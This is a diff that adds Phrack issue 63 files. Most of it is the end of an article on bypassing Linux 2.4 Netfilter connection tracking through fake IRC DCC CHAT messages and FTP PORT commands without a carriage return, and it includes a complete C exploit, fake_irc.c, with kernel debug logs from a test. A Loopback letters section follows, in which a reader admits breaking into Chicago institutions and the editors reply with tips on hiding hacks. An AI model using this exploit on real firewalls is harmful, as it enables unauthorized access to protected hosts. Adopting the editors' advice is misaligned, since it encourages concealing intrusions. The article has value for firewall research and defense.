+    Suppose that a malicious user who logged on the FTP server transmits a
+PORT command with TCP port number 6667(this is a default IRC server port
+number) on the external network and then attempts to download a file from
+the server.
+
+    The FTP server actively initiates a data connection to the data port
+6667 on the attacker's host. The firewall accepts this connection under the
+stateful packet filtering rule stated before. Once the connection is
+established, the connection-tracking module of the firewall(in the Linux
+kernel 2.4.18) has the security flaw to mistake this for an IRC connection.
+Thus the attacker's host can pretend to be an IRC server.
+
+    If the attacker downloads a file comprised of a string that has the
+same pattern as DCC CHAT command, the connection-tracking module will
+misunderstand the contents of a packet for the file transfer as a DCC CHAT
+command.
+
+    As a result, the firewall allows any host to connect to the TCP port
+number, which is specified in the fake DCC CHAT command, on the fake IRC
+client (i.e., the FTP server) according to the rule to accept the "related"
+connection for IRC. For this, the attacker has to upload the file before
+the intrusion.
+
+    In conclusion, the attacker is able to illegally connect to any TCP
+port on the FTP server.
+
+
+----[ 3.2 - First Trick Details
+
+    To describe this in detail, let's assume a network configuration is as
+follows.
+
+(a) A Netfilter/IPtables box protects an FTP server in a network. So users
+    in the external network can connect only to FTP server port on the FTP
+    server. Permitted users can log on the server and download/upload
+files.
+
+(b) Users in the protected network, including FTP server host, can connect
+    only to IRC servers in the external network.
+
+(c) While one of the internet services stated in (a) and (b) is
+    established, the secondary connections(e.g., FTP data connection)
+    related to the service can be accepted temporarily.
+
+(d) Any other connections are blocked.
+
+    To implement stateful inspection for IRC and FTP, the administrator
+loads the IP connection tracking modules called ip_conntrack into the
+firewall including ip_conntrack_ftp and ip_conntrack_irc that track FTP and
+IRC, respectively. Ipt_state must be also loaded.
+
+    Under the circumstances, an attacker can easily create a program that
+logs on the FTP server and then makes the server actively initiate an FTP
+data connection to an arbitrary TCP port on his/her host.
+
+    Suppose that he/she transmits a PORT command with data port 6667 (i.e.,
+default IRC server port).
+
+An example is "PORT 192,168,100,100,26,11\r\n".
+
+    The module ip_conntrack_ftp tracking this connection analyzes the PORT
+command and "expects" the FTP server to issue an active open to the
+specified port on the attacker's host.
+
+    Afterwards, the attacker sends an FTP command to download a file,
+"RETR <a file name>". The server tries to connect to port 6667 on the
+attacker's host. Netfilter accepts the FTP data connection under the
+stateful packet filtering rule.
+
+    Once the connection is established, the module ip_conntrack mistakes
+this for IRC connection. Ip_conntrack regards the FTP server as an IRC
+client and the attacker's host as an IRC server. If the fake IRC client
+(i.e., the FTP server) transmits packets for the FTP data connection, the
+module ip_conntrack_irc will try to find a DCC protocol message from the
+packets.
+
+    The attacker can make the FTP server send the fake DCC CHAT command
+using the following trick. Before this intrusion, the attacker uploads a
+file comprised of a string that has the same pattern as a DCC CHAT command
+in advance.
+
+    To my knowledge, the form of a DCC CHAT command is as follows.
+
+"\1DCC<a blank>CHAT<a blank>t<a blank><The decimal IP address of the IRC
+client><blanks><The TCP port number of the IRC client>\1\n"
+
+An example is "\1DCC CHAT t 3232236548    8000\1\n"
+
+    In this case, Netfilter allows any host to do an active open to the TCP
+port number on the IRC client specified in the line. The attacker can, of
+course, arbitrarily specify the TCP port number in the fake DCC CHAT
+command message.
+
+    If a packet of this type is passed through the firewall, the module
+ip_conntrack_irc mistakes this message for a DCC CHAT command and "expects"
+any host to issue an active open to the specified TCP port number on the
+FTP server for a direct chatting.
+
+    As a result, Netfilter allows the attacker to connect to the port
+number on the FTP server according to the stateful inspection rule.
+
+    After all, the attacker can illegally connect to any TCP port on the
+FTP server using this trick.
+
+
+--[ 4 - Attack Scenario II - Non-standard command line
+
+----[ 4.1. Second Trick Details
+
+    Netfilter in the Linux kernel 2.4.20(and the later versions) is so
+fixed that a secondary connection(e.g., an FTP data connection) accepted by
+a primary connection is not mistaken for that of any other protocol. Thus
+the packet contents of an FTP data connection are not parsed any more by
+the IRC connection-tracking module.
+
+    However, I've created a way to connect illegally to any TCP port on an
+FTP server that Netfilter protects by dodging connection tracking using a
+nonstandard FTP command. As stated before, I confirmed that it worked in
+the Linux kernel 2.4.28.
+
+    Under the circumstances stated in the previous chapter, a malicious
+user in the external network can easily create a program that logs on the
+FTP server and transmits a nonstandard FTP command line.
+
+    For instance, an attacker can transmit a PORT command without the
+character <CR> in the end of the line. The command line has only <LF> in
+the end.
+
+    An example is "PORT 192,168,100,100,26,11\n".
+
+    On the contrary, a standard FTP command has <CRLF> sequence to denote
+the end of a line.
+
+    If the module ip_conntrack_ftp receives a nonstandard PORT command of
+this type, it first detects a command and finds the character <CR> for the
+parsing. Because it cannot be found, ip_conntrack_ftp regards this as a
+"partial" command and drops the packet.
+
+    Just before this action, ip_conntrack_ftp anticipated the sequence
+number of a packet that contains the next FTP command line and updated the
+associated information. This number is calculated based on the TCP sequence
+number and the data length of the "partial" PORT command packet.
+
+    However, a TCP client, afterwards, usually retransmits the identical
+PORT command packet since the corresponding reply is not arrived at the
+client. In this case, ip_conntrack_ftp does NOT consider this retransmitted
+packet as an FTP command because its sequence number is different from that
+of the next FTP command anticipated. From the point of view of
+ip_conntrack_ftp, the packet has a "wrong" sequence number position.
+
+    The module ip_conntrack_ftp just accepts the packet without analyzing
+this command. The FTP server can eventually receive the retransmitted
+packet from the attacker.
+
+    Although ip_conntrack_ftp regards this "partial" command as INVALID,
+some FTP servers such as wu-FTP and IIS FTP conversely consider this PORT
+command without <CR> as VALID. In conclusion, the firewall, in this case,
+fails to "expect" the FTP data connection.
+
+    And when the attacker sends a RETR command to download a file from the
+server, the server initiates to connect to the TCP port number, specified
+in the partial PORT command, on the attacker's host.
+
+    Suppose that the TCP port number is 6667(IRC server port), the firewall
+accepts this connection under the stateless packet filtering rule that
+allows IRC connections instead of the stateful filtering rule. So the IP
+connection-tracking module mistakes the connection for IRC.
+
+    The next steps of the attack are the same as those of the trick stated
+in the previous chapter.
+
+    In conclusion, the attacker is able to illegally connect to any TCP
+port on the FTP server that the Netfilter firewall box protects.
+
+*[supplement] There is a more refined method to dodge the
+connection-tracking of Netfilter. It uses default data port. On condition
+that data port is not specified by a PORT command and a data connection is
+required to be established, an FTP server does an active open from port 20
+on the server to the same (a client's) port number that is being used for
+the control connection.
+
+    To do this, the client has to listen on the local port in advance. In
+addition, he/she must bind the local port to 6667(IRCD) and set the socket
+option "SO_REUSEADDR" in order to reuse this port.
+
+    Because a PORT command never passes through a Netfilter box, the
+firewall can't anticipate the data connection. I confirmed that it worked
+in the Linux kernel 2.4.20.
+
+** A demonstration tool and an example of this attack are described in
+APPENDIX I and APPENDIX II, respectively.
+
+
+--[ 5 - Attack Scenario III - 'echo' feature of FTP reply
+
+----[ 5.1 - Passive FTP: background information
+
+    An FTP server is able to do a passive open for a data connection as
+well. This is called passive FTP. On the contrary, FTP that does an active
+open is called active FTP.
+
+    Just before file transfer in the passive mode, the client sends a PASV
+command and the server replies the corresponding message with a data port
+number to the client. An example is as follows.
+
+-> PASV\r\n
+<- 227 Entering Passive Mode (192,168,20,20,42,125)\r\n
+
+    Like a PORT command, the IP address and port number are separated by
+commas. Meanwhile, when you enter a user name, the following command and
+reply are exchanged.
+
+-> USER <a user name>\r\n
+<- 331 Password required for <the user name>.\r\n
+
+
+----[ 5.2 - Third Trick Details
+
+    Right after a user creates a connection to an FTP server, the server
+usually requires a user name. When the client enters a login name at FTP
+prompt, a USER command is sent and then the same character sequence as the
+user name, which is a part of the corresponding reply, is returned like
+echo. For example, a user enters the sting "Alice Lee" as a login name at
+FTP prompt, the following command line is sent across the control
+connection.
+
+-> USER Alice Lee\r\n
+
+    The FTP server usually replies to it as follows.
+
+<- 331 Password required for Alice Lee.\r\n
+
+("Alice Lee" is echoed.)
+
+Blanks are able to be included in a user name.
+
+    A malicious user can insert a arbitrary pattern in the name. For
+instance, when the same pattern as the reply for passive FTP is inserted in
+it, a part of the reply is arrived like a reply related to passive FTP.
+
+-> USER 227 Entering Passive Mode (192,168,20,29,42,125)\r\n
+<- 331 Password required for 227 Entering Passive Mode
+(192,168,20,29,42,125).\r\n
+
+    Does a firewall confuse it with a `real' passive FTP reply? Maybe most
+firewalls are not deceived by the trick because the pattern is in the
+middle of the reply line.
+
+    However, suppose that the TCP window size field of the connection is
+properly adjusted by the attacker when the connection is established, then
+the contents can be divided into two like two separate replies.
+
+(A) ----->USER xxxxxxxxx227 Entering Passive Mode
+(192,168,20,29,42,125)\r\n
+(B) <-----331 Password required for xxxxxxxxx
+(C) ----->ACK(with no data)
+(D) <-----227 Entering Passive Mode (192,168,20,20,42,125).\r\n
+
+(where the characters "xxxxx..." are inserted garbage used to adjust the
+data length.)
+
+    I actually tested it for Netfilter/IPTables. I confirmed that Netfilter
+does not mistake the line (D) for a passive FTP reply at all.
+
+The reason is as follows.
+
+    (B) is not a complete command line that ends with <LF>. Netfilter,
+thus, never considers (D), the next packet data of (B) as the next reply.
+As a result, the firewall doesn't try to parse (D).
+
+    But, if there were a careless connection-tracking firewall, the attack
+would work.
+
+    In the case, the careless firewall would expect the client to do an
+active open to the TCP port number, which is specified in the fake reply,
+on the FTP server. When the attacker initiates a connection to the target
+port on the server, the firewall eventually accepts the illegal connection.
+
+
+--[ 6 - APPENDIX I. A demonstration tool of the second trick
+
+I wrote an exploiting program using C language. I used the following
+compilation command.
+
+/>gcc -Wall -o fake_irc fake_irc.c
+
+The source code is as follows.
+
+/*
+USAGE : ./fake_irc <an FTP server IP> <a target port>
+<a user name> <a password> <a file name to be downloaded>
+
+- <an FTP server IP> : An FTP server IP that is a victim
+- <a target port> : the target TCP port on the FTP server to which an
+attacker wants to connect
+- <a user name> : a user name used to log on the FTP server
+- <a password> : a password used to log on the FTP server
+- <a file name to be downloaded> : a file name to be downloaded from the
+FTP server
+*/
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+#include <sys/socket.h>
+#include <arpa/inet.h>
+
+#define BUF_SIZE 2048
+#define DATA_BUF_SZ 65536
+#define IRC_SERVER_PORT 6667
+#define FTP_SERVER_PORT 21
+
+static void usage(void)
+{
+ printf("USAGE : ./fake_irc "
+ "<an FTP server IP> <a target port> <a user name> "
+ "<a password> <a file name to be downloaded>\n");
+
+ return;
+}
+
+void send_cmd(int fd, char *msg)
+{
+ if(send(fd, msg, strlen(msg), 0) < 0) {
+  perror("send");
+
+  exit(0);
+ }
+
+ printf("--->%s\n", msg);
+}
+
+void get_reply(int fd)
+{
+ char read_buffer[BUF_SIZE];
+ int size;
+
+ //get the FTP server message
+ if( (size = recv(fd, read_buffer, BUF_SIZE, 0)) < 0) {
+  perror("recv");
+
+  exit(0);
+ }
+
+ read_buffer[size] = '\0';
+
+ printf("<---%s\n", read_buffer);
+}
+
+void cmd_reply_xchg(int fd, char *msg)
+{
+ send_cmd(fd, msg);
+ get_reply(fd);
+}
+
+/*
+argv[0] : a program name
+argv[1] : an FTP server IP
+argv[2] : a target port on the FTP server host
+argv[3] : a user name
+argv[4] : a password
+argv[5] : a file name to be downloaded
+*/
+int main(int argc, char **argv)
+{
+ int fd, fd2, fd3, fd4;
+ struct sockaddr_in serv_addr, serv_addr2;
+ char send_buffer[BUF_SIZE];
+ char *ftp_server_ip, *user_id, *pwd, *down_file;
+ unsigned short target_port;
+ char data_buf[DATA_BUF_SZ];
+ struct sockaddr_in sa_cli;
+ socklen_t client_len;
+ unsigned int on = 1;
+ unsigned char addr8[4];
+ int datasize;
+
+ if(argc != 6) {
+  usage();
+  return -1;
+ }
+
+ ftp_server_ip = argv[1];
+ target_port = atoi(argv[2]);
+ user_id = argv[3];
+ pwd = argv[4];
+ down_file = argv[5];
+
+ if((fd = socket(AF_INET, SOCK_STREAM, 0)) <0) {
+  perror("socket");
+  return -1;
+ }
+
+ bzero(&serv_addr, sizeof(struct sockaddr_in));
+ serv_addr.sin_family = AF_INET;
+ serv_addr.sin_port = htons(FTP_SERVER_PORT);
+ serv_addr.sin_addr.s_addr = inet_addr(ftp_server_ip);
+
+ //connect to the FTP server
+ if(connect(fd, (struct sockaddr *) &serv_addr, sizeof(struct sockaddr))) {
+  perror("connect");
+  return -1;
+ }
+
+ //get the FTP server message
+ get_reply(fd);
+
+ //exchange a USER command and the reply
+ sprintf(send_buffer, "USER %s\r\n", user_id);
+ cmd_reply_xchg(fd, send_buffer);
+
+
+ //exchange a PASS command and the reply
+ sprintf(send_buffer, "PASS %s\r\n", pwd);
+ cmd_reply_xchg(fd, send_buffer);
+
+ //exchange a SYST command and the reply
+ sprintf(send_buffer, "SYST\r\n");
+ cmd_reply_xchg(fd, send_buffer);
+
+ sleep(1);
+
+ //write a PORT command
+ datasize = sizeof(serv_addr);
+
+ if(getsockname(fd, (struct sockaddr *)&serv_addr, &datasize) < 0 ) {
+  perror("getsockname");
+  return -1;
+ }
+
+ memcpy(addr8, &serv_addr.sin_addr.s_addr, sizeof(addr8));
+
+ sprintf(send_buffer, "PORT %hhu,%hhu,%hhu,%hhu,%hhu,%hhu\n",
+  addr8[0], addr8[1], addr8[2], addr8[3],
+  IRC_SERVER_PORT/256, IRC_SERVER_PORT % 256);
+
+ cmd_reply_xchg(fd, send_buffer);
+
+ //Be a server for an active FTP data connection
+ if((fd2 = socket(AF_INET, SOCK_STREAM, 0)) <0) {
+  perror("socket");
+  return -1;
+ }
+
+ if(setsockopt(fd2, SOL_SOCKET, SO_REUSEADDR, &on, sizeof(on)) < 0) {
+  perror("setsockopt");
+  return -1;
+ }
+
+ bzero(&serv_addr, sizeof(struct sockaddr_in));
+ serv_addr.sin_family = AF_INET;
+ serv_addr.sin_port = htons(IRC_SERVER_PORT);
+ serv_addr.sin_addr.s_addr = INADDR_ANY;
+
+ if( bind(fd2, (struct sockaddr *)&serv_addr, sizeof(serv_addr)) < 0 ) {
+  perror("bind");
+  return -1;
+ }
+
+ if( listen(fd2, SOMAXCONN) < 0 ) {
+  perror("listen");
+  return -1;
+ }
+
+ //send a RETR command after calling listen()
+ sprintf(send_buffer, "RETR %s\r\n", down_file);
+ cmd_reply_xchg(fd, send_buffer);
+
+
+ //accept the active FTP data connection request
+ client_len = sizeof(sa_cli);
+ bzero(&sa_cli, client_len);
+
+ fd3 = accept (fd2, (struct sockaddr*) &sa_cli, &client_len);
+
+ if( fd3 < 0 ) {
+  perror("accept");
+  return -1;
+ }
+
+ //get the fake DCC command
+ bzero(data_buf, DATA_BUF_SZ);
+
+ if( recv(fd3, data_buf, DATA_BUF_SZ, 0) < 0) {
+  perror("recv");
+  return -1;
+ }
+ puts(data_buf);
+
+ ///Start of the attack
+ if((fd4= socket(AF_INET, SOCK_STREAM, 0)) <0) {
+  perror("socket");
+  return -1;
+ }
+
+ bzero(&serv_addr2, sizeof(struct sockaddr_in));
+ serv_addr2.sin_family = AF_INET;
+ serv_addr2.sin_port = htons(target_port );
+ serv_addr2.sin_addr.s_addr = inet_addr(ftp_server_ip);
+
+ if(connect(fd4, (struct sockaddr *)&serv_addr2, sizeof(struct sockaddr)))
+{
+  perror("connect");
+  return -1;
+ }else
+  printf("\nConnected to the target port!!\n");
+
+ //Here, communicate with the target port
+ sleep(3);
+
+ close(fd4);//close the attack connection
+ /////////////The end of the attack.
+
+ close(fd3);//close the FTP data connection
+
+
+ //get the reply of FTP data transfer completion
+ get_reply(fd);
+
+ sleep(1);
+
+ close(fd);//close the FTP control connection
+ close(fd2);
+
+ return 0;
+
+}/*The end*/
+
+--------------------------------------------
+
+--[ 7 - APPENDIX II. A demonstration example of the second attack trick
+
+The followings are the circumstances in which I tested it actually.
+
+The below symbol "[]" stands for a computer box.
+
+[An attacker's host]-----[A firewall]-----[An FTP server]
+(The network interfaces, eth1 and eth2 of the firewall are directly linked
+to the attacker's host and server, respectively.)
+
+    As shown in the above figure, packets being transmitted between the FTP
+client(i.e., the attacker) and the FTP server pass through the linux box
+with IPTables in the Linux kernel 2.4.28.
+
+The IP addresses assigned in each box are as follows.
+
+(a) The attacker's host : 192.168.3.3
+(b) eth1 port in the Linux box : 192.168.3.1
+(c) The FTP server : 192.168.4.4
+(d) eth2 port in the Linux box : 192.168.4.1
+
+    A TCP server is listening on the FTP server's host address and port
+8000.  The server on port 8000 is protected by IPTables. The attacker tried
+to connect illegally to port 8000 on the FTP server in this demonstration.
+
+    The associated records during this attack are written in the following
+order.
+
+(1) The system configurations in the firewall, including the ruleset of
+    IPTables
+(2) Tcpdump outputs on eth1 port of the firewall
+(3) Tcpdump outputs on eth2 port of the firewall
+(4) The file /proc/net/ip_conntrack data with the change of times. It shows
+    the information on connections being tracked.
+(5) DEBUGP(), printk messages for debug in the source
+    files(ip_conntrack_core.c, ip_conntrack_ftp.c and ip_conntrack_irc.c).
+    For the detailed messages, I activated the macro function DEBUGP() in
+    the files.
+
+    Since some characters of the messages are Korean, they have been
+deleted. I am sorry for this.
+
+=====================================================================
+
+(1) The system configurations in the firewall
+
+[root@hans root]# uname -a
+Linux hans 2.4.28 #2 2004. 12. 25. () 16:02:51 KST i686 unknown
+
+[root@hans root]# lsmod
+Module                  Size  Used by    Not tainted
+ip_conntrack_irc        5216   0  (unused)
+ip_conntrack_ftp        6304   0  (unused)
+ipt_state               1056   1  (autoclean)
+ip_conntrack           40312   2  (autoclean) [ip_conntrack_irc
+ip_conntrack_ftp
+ipt_state]
+iptable_filter          2432   1  (autoclean)
+ip_tables              16992   2  [ipt_state iptable_filter]
+ext3                   64032   3  (autoclean)
+jbd                    44800   3  (autoclean) [ext3]
+usbcore                48576   0  (unused)
+
+
+[root@hans root]# iptables -L
+Chain INPUT (policy ACCEPT)
+target     prot opt source               destination
+
+Chain FORWARD (policy DROP)
+target     prot opt source               destination
+ACCEPT     tcp  --  192.168.3.3          192.168.4.4        tcp dpt:ftp
+ACCEPT     tcp  --  anywhere             anywhere           tcp dpt:auth
+ACCEPT     tcp  --  192.168.4.4          192.168.3.3        tcp dpt:ircd
+ACCEPT     all  --  anywhere             anywhere           state
+RELATED,ESTABL
+ISHED
+
+Chain OUTPUT (policy ACCEPT)
+target     prot opt source               destination
+
+
+
+[root@hans root]# route -n
+Kernel IP routing table
+Destination     Gateway         Genmask         Flags Metric Ref    Use
+Iface
+192.168.4.0     0.0.0.0         255.255.255.0   U     0      0        0
+eth2
+192.168.3.0     0.0.0.0         255.255.255.0   U     0      0        0
+eth1
+192.168.150.0   0.0.0.0         255.255.255.0   U     0      0        0
+eth0
+127.0.0.0       0.0.0.0         255.0.0.0       U     0      0        0 lo
+
+=====================================================================
+
+(2) Tcpdump outputs on eth1 port of the firewall
+
+You can see that the "partial" PORT commands were transmitted and an
+illegal connection to port 8000 was established.
+
+tcpdump -nn -i eth1 -s 0 -X
+
+    [ phrack staff: Output removed. Do it on your own. ]
+
+=====================================================================
+
+(3) Tcpdump outputs on eth2 port of the firewall
+
+Only one PORT command w/o <CR> is shown on eth2 port since the first one
+was dropped.
+
+tcpdump -nn -i eth2 -s 0 -X
+
+
+    [ phrack staff: Output removed. Get skilled. Do it yourself! ]
+
+=====================================================================
+
+(4) The file /proc/net/ip_conntrack data with change of times.
+
+The file /proc/net/ip_conntrack shows the information on connections being
+tracked. To that end, I executed the following shell command.
+
+/>watch -n 1 "data >> /tmp/ipconn.txt;cat /proc/net/ip_conntrack >>
+/tmp/ipconn.txt"
+
+Note : Connections that are not associated with this test are seen from
+time to time. I am sorry for this.
+
+    [ phrack staff: Output removed. Use the force luke! ]
+
+=====================================================================
+(5) dmesg outputs
+
+->The following paragraph in the message shows that the first PORT command
+w/o <CR> was regarded as "partial" and thus dropped.
+
+Dec 31 15:03:40 hans kernel: find_pattern `PORT': dlen = 23
+Dec 31 15:03:40 hans kernel: Pattern matches!
+Dec 31 15:03:40 hans kernel: Skipped up to ` '!
+Dec 31 15:03:40 hans kernel: Char 17 (got 5 nums) `10' unexpected
+Dec 31 15:03:40 hans kernel: conntrack_ftp: partial PORT 1273167371+23
+
+
+->The following paragraph shows that the second invalid PORT command w/o
+<CR> was accepted because it was regarded as a packet that had a wrong
+sequence position.(i.e., the packet was not regarded as an FTP command)
+
+Dec 31 15:03:40 hans kernel: ip_conntrack_in: normal packet for d7369080
+Dec 31 15:03:40 hans kernel: conntrack_ftp: datalen 23
+Dec 31 15:03:40 hans kernel: conntrack_ftp: datalen 23 ends in \n
+Dec 31 15:03:40 hans kernel: ip_conntrack_ftp_help: wrong seq pos
+(1273167394)
+
+
+->The following shows that the connection-tracking module mistook the FTP
+data connection for IRC.
+
+Dec 31 15:03:40 hans kernel: ip_conntrack_in: new packet for d73691c0
+Dec 31 15:03:40 hans kernel: ip_conntrack_irc.c:help:entered
+Dec 31 15:03:40 hans kernel: ip_conntrack_irc.c:help:Conntrackinfo = 2
+Dec 31 15:03:40 hans kernel: Confirming conntrack d73691c0
+
+
+->The following shows that ip_conntrack_irc mistook the packet contents of
+the FTP data connection for a DCC CHAT command and "expected" the fake
+chatting connection.
+
+Dec 31 15:03:40 hans kernel: ip_conntrack_in: normal packet for d73691c0
+Dec 31 15:03:40 hans kernel: ip_conntrack_irc.c:help:entered
+Dec 31 15:03:40 hans kernel: ip_conntrack_irc.c:help:DCC found in master
+192.168.4.4:20  192.168.3.3:6667...
+Dec 31 15:03:40 hans kernel: ip_conntrack_irc.c:help:DCC CHAT  detected
+Dec 31 15:03:40 hans kernel: ip_conntrack_irc.c:help:DCC bound ip/port:
+192.168.4.4:8000
+Dec 31 15:03:40 hans kernel: ip_conntrack_irc.c:help:tcph->seq = 3731565152
+Dec 31 15:03:40 hans kernel: ip_conntrack_irc.c:help:wrote info
+seq=1613392874  (ofs=33), len=21
+Dec 31 15:03:40 hans kernel: ip_conntrack_irc.c:help:expect_related
+0.0.0.0:0-192.168.4.4:8000
+Dec 31 15:03:40 hans kernel: ip_conntrack_expect_related d73691c0
+Dec 31 15:03:40 hans kernel: tuple: tuple d6c61d94: 6 0.0.0.0:0 ->
+192.168.4.4:8000
+Dec 31 15:03:40 hans kernel: mask:  tuple d6c61da4: 65535 0.0.0.0:0 ->
+255.255.255.255:65535
+Dec 31 15:03:40 hans kernel: new expectation d7cf82e0 of conntrack d73691c0
+
+
+->The following shows that ip_conntrack, after all, accepted the illegal
+connection to port 8000 under the stateful inspection rule.
+
+Dec 31 15:03:40 hans kernel: conntrack: expectation arrives ct=d7369260
+exp=d7cf82e0
+Dec 31 15:03:41 hans kernel: ip_conntrack_in: related packet for d7369260
+Dec 31 15:03:41 hans kernel: Confirming conntrack d7369260
+Dec 31 15:03:41 hans kernel: ip_conntrack_in: normal packet for d7369260
+
+|=[ EOF ]=---------------------------------------------------------------=|
+
diff --git a/phrack63/2.txt b/phrack63/2.txt
new file mode 100644
index 0000000..13b58ef
--- /dev/null
+++ b/phrack63/2.txt
@@ -0,0 +1,161 @@
+                           ==Phrack Inc.==
+
+              Volume 0x0b, Issue 0x3f, Phile #0x02 of 0x14
+
+|=----------------------=[ L O O P B A C K ]=----------------------------=|
+|=-----------------------------------------------------------------------=|
+|=-----------------------=[ Phrack  Staff ]=-----------------------------=|
+
+
+    Wow people. We received so much feedback since we announced
+that this is our final issue. I'm thrilled. We are hated by so many
+(hi Mr. Government) and loved but so few. And yet it's because of the few
+what kept us alive.
+
+"Phrack helped me survive the crazyness and boredom inherent in The Man's
+ system. Big thanks to all authors, editors and hangarounds of Phrack,
+ past and present." --- Kurisuteru
+
+    [ ... ]
+
+"Guys, if it wasn't for you, the internet wouldn't be the same, our
+whole lifes wouldn't be the same. I wish you all the best luck there
+is in your future. God bless you all and good bye!!!!! --- wolfinux
+
+   [ I hope there is a god. There must be. Because I ran this magazine. I
+     fought against unjustice, opression and against all those who wanted
+     to shut us down. I fought against stupidity and ignorance. I shook
+     hands with the devil. I have seen him, I have smelled him and I have
+     touched him. I know the devil exists and therefore I know there is a
+     God. ]
+
+"you're the first zine that i ever readed and you have a special place in
+ my heart... you build my mind!! Thanks you all !!!!" --- thenucker/xy
+
+
+  [ This brotherhood will continue...]
+
+|=[ 0x01 ]=--------------------------------------------------------------=|
+
+I'm hoping the site isn't being abandoned because of pressure from Homeland
+Security.
+
+   [ I do not have a homeland. I do not believe in governments that scare
+     the people. I do not bow for anyone. I do what I do best: I spread
+     the spirit. ]
+
+|=[ 0x02 ]=--------------------------------------------------------------=|
+
+Could you please remove my personal info from this issue?
+http://www.phrack.org/phrack/52/P52-02
+
+Thanks in advance.
+Itai Dor-On             [ <--- him. signing with real name. ]
+
+    [ We are not doing phrack anymore. Sorry mate. Ask the new staff. ]
+
+|=[ 0x03 ]=--------------------------------------------------------------=|
+
+Are you interested in one "Cracking for Newbies" article?
+Or maybe about how to make a Biege Box?
+
+    [ y0, psst. are you the guy that travels through time and tries to
+      sell wisdom from the past? wicked!!!!!!!!! You are the man! ]
+
+|=[ 0x04 ]=--------------------------------------------------------------=|
+
+From: Joshua ruffolo <ruffolojoshua@yahoo.com>
+
+A friend referred me to your site.
+
+    [ smart guy! ]
+
+I know nothing much about what is posted.
+
+    [ stupid guy! ]
+
+I don't understand what's what.
+
+    [ this is loopback. ]
+
+Apparently there is some basic info that should be known to understand, but
+what is it?
+
+    [ reading happens from the left to the right:
+      from HERE  -->  --> --> --> TO --> --> --> --> --> --> HERE ]
+
+|=[ 0x05 ]=--------------------------------------------------------------=|
+
+During the spring quarter 2004 I took the Advanced Network Security class
+at Northwestern University.
+
+   [ Must been challenging. Did they give you a Offical Master Operator
+     Intense Security Expert X4-Certificate and tell you that you did
+     really well?  Bahahahahahahah. ]
+
+And I worked on a security project that has gained the interest of the
+CBS 2 Chicago investigative unit.
+
+   [ Oh shit! the CBS is after you. Oh Shit. OH SHIT! I heard they
+     got certified 2 years before you! THEY ARE BETTER. I'M TELLING YOU!
+     RUUUUUUUN! ]
+
+By pure accident I compromised a large City of Chicago institution over the
+2003-2004 Christmas break. 
+
+   [ These accidents happen all the time. Ask my lawyer. ]
+
+During my research for this project I have compromised other large
+Chicagoland institutions.
+
+   [ Rule 1: If you hack dont tell it to anyone. It's risky. Especially
+     in the country where you are living. ]
+
+For now, I would just like to know if anyone out there has penetrated the
+following networks and obtained any confidential data or left back doors to
+the following networks. Chicago Public Schools, City of Chicago, Chicago
+Police or Cook County.
+
+    [ Rule 2: Dont ever tell anyone what you hacked. ]
+
+Christopher B. Jurczyk
+c-jurczyk@northwestern.edu
+
+    [ Rule 3: DONT FUCKING POST YOUR EMAIL TO LOOPBACK!!!! ]
+
+|=[ 0x06 ]=--------------------------------------------------------------=|
+
+BTW I noticed phrack.org has no reverse DNS. Deliberate?
+
+   [ anti hacker techniques. ]
+
+|=[ 0x07 ]=--------------------------------------------------------------=|
+
+From: tammy morgan <pipy2u@yahoo.com>
+
+Ok i know you hate dumb questons.
+
+    [ I love them. They make my day. ]
+
+Being new to this world cant read mag issues. Am subscriber got list
+from bot must have key.
+
+    [ Am editor. Dont get you saying what. Hi. ]
+
+But which one do i use to unlock and read. Soooo "LAME" sorry sorry i am,
+but could you take pity and just tell me how to open and read issues?
+
+
+    [ ... ]
+
+|=[ 0x08 ]=--------------------------------------------------------------=|
+
+From: Joshua Morales <moreasm@yahoo.com>
+
+This is really stupid question. can i subscribe to
+your publication.
+
+    [ This is a really smart question: Who gave you our email address? ]
+
+|=[ EOF ]=---------------------------------------------------------------=|
+
diff --git a/phrack63/20.txt b/phrack63/20.txt
new file mode 100644
index 0000000..b78ed07
--- /dev/null
+++ b/phrack63/20.txt
@@ -0,0 +1,292 @@
+                           ==Phrack Inc.==
+
+              Volume 0x0b, Issue 0x3f, Phile #0x14 of 0x14
+
+|=-----------------------------------------------------------------------=|
+|=--------------------=[ W O R L D   N E W S ]=--------------------------=|
+|=-----------------------------------------------------------------------=|
+
+
+*** NSA & PHRACK ***
+
+.. And in a positive way.  See:
+http://www.nsa.gov/snac/
+
+Which has a section specifically for routers:                                    
+http://www.nsa.gov/snac/downloads_cisco.cfm?MenuID=scg10.3.1
+
+And on page 80 Phrack is at the top of the list of references.
+
+**** QUICK NEWS **** QUICK NEWS **** QUICK NEW ***** QUICK NEWS ****
+**** QUICK NEWS **** QUICK NEWS **** QUICK NEW ***** QUICK NEWS ****
+**** QUICK NEWS **** QUICK NEWS **** QUICK NEW ***** QUICK NEWS ****
+
+And once gain ... two big companies, Cisco and ISS, try to scare free
+researchers to not talk about the problems in their software.
+
+Michael Lynn has shown great courage and made use of his natural-born
+rights: to talk. 
+
+Quote from his homepage:
+
+   'People who know me will tell you I have a long history of
+                                   not being afraid of people I should.'
+
+Kudos to Lynn from the Staff @ Phrack.
+
+From Michael Lynn's homepage:
+
+A dangerous culture regarding hardware based network devices as impervious
+to remote compromise has been allowed to exist. Mike has taken on enormous
+personal risk to do the right thing for the security research community by
+coming forward with his research and bringing this problem into focus.
+
+Cisco has consistently been on the forefront of this dangerous culture. They
+exercise a strategy of walling off updates and information only to those
+with support contracts. In many areas of critical infrastructure, engineers
+are often limited in their ability to utilize the latest security updates
+due to their IOS feature train. For years, attempting to adopt SSH as the
+primary method of administration for Cisco hardware has provided a perfect
+example of Cisco's broken security culture. Their handling of this situation
+is putting icing on the cake. We must encourage change in Cisco's security
+culture.
+
+ISS's actions to date have shown an effect of this broken security culture.
+ISS's handling of this critical security threat and the researcher that
+found it have been less then desirable. We are confident our free-market
+business and media environment will result in both ISS and Cisco learning
+lessons from this event.
+
+http://www.nicklevay.net/
+http://blogs.pcworld.com/staffblog/
+http://blogs.washingtonpost.com/securityfix/2005/07/update_to_cisco.html
+
+---
+
+Welcome to Austin/Texas International Airport. Please check out our
+new camera system. We can spy on our employees, our citizans and
+even on our president. Try it out now:
+
+http://lobbycamera4.abia.org
+
+---
+
+Microsofts goes l33t: The 31337 dictionary
+http://www.microsoft.com/athome/security/children/kidtalk.mspx
+
+---
+
+This is a big fuckup of what happens if you dont watch out:
+1) An attack happens
+2) Politicans scare the shit out of the people and tell them it will
+   happen again!
+3) People accept to give up their rights, their freedom and their brain.
